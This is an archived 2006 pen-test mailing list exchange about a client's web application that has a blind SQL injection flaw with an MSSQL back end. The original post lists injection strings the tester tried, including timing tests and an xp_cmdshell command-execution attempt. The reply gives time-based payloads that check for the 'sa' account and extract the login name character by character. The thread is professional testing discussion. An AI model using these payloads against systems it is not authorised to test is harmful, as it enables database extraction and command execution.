Re: Blind SQL Injection Techniques

["Leonardo Rodrigues" <leonardo.rsouza () terra com br>]

Hi,

Try something like this

;if system_user = char(115)+char(97) waitfor delay '0:0:05';--

But if you really want to determine the connection user, break system_user
with substring() and test each character...

if (SELECT ASCII(SUBSTRING((a.loginame),1,1)) FROM master..sysprocesses AS a
WHERE a.spid = @@SPID) > 76 waitfor delay '00:00:05';--

A tool like absinthe (0x90.org) would help you.

[]'s

Leo
----- Original Message ----- 
From: <One2 () onetwo com>
To: <pen-test () securityfocus com>
Sent: Wednesday, December 13, 2006 5:41 AM
Subject: Blind SQL Injection Techniques


> Hi All,
>
> I am testing a client at the moment who has a Blind SQL Injection
vulnerability and am running out of techniques, so need some tips.
> I injected the following string to validate that the system has an MSSQL
server at the back-end.
>  or 1=1;select * from sysobjects;--
>
> This returned a valid page.
>
> Also injected the following and got a valid page, but again no data since
it is completely blind.
>  or 1=1;select @@version;--
>
> Replacing sysobjects, in the first example, with an invalid table returns
a custom error page that doesn't disclose anything.
> It seems that when injecting any invalid sql statement I get the same
custom error page coming back that doesn't reveal any information.
> My next step was to determine whether the DB was running as system. I
tried using the following command;
>  or 1=1;if (select user) = 'sa' waitfor delay '0:0:5';--
>
> ... but got the error page, indicating that it didn't work - especially
since it didn't take 5 seconds. I then tried simplifying it to just;
>  waitfor delay '0:0:5';--
>
> ... but again, the error page, indicating this command was not working. I
thought it was the quotes but the following were successful;
>  or 1=1;select * from 'sysobjects';--
>  or 1=1;select * from "sysobjects";--
>
> I then tried the following to see if I could actually run system commands;
>
>  or 1=1;exec master..xp_cmdshell dir;--
>
> ... but this got the error page again indicating unsuccessful.
>
> Any suggestions on gaining further information or access on this system
would be appreciated.
> Thanks,
> One2
>
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> ------------------------------------------------------------------------
>
>
> Esta mensagem foi verificada pelo E-mail Protegido Terra.
> Scan engine: McAfee VirusScan / Atualizado em 13/12/2006 / Versão:
4.4.00/4918
> Proteja o seu e-mail Terra: http://mail.terra.com.br/


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------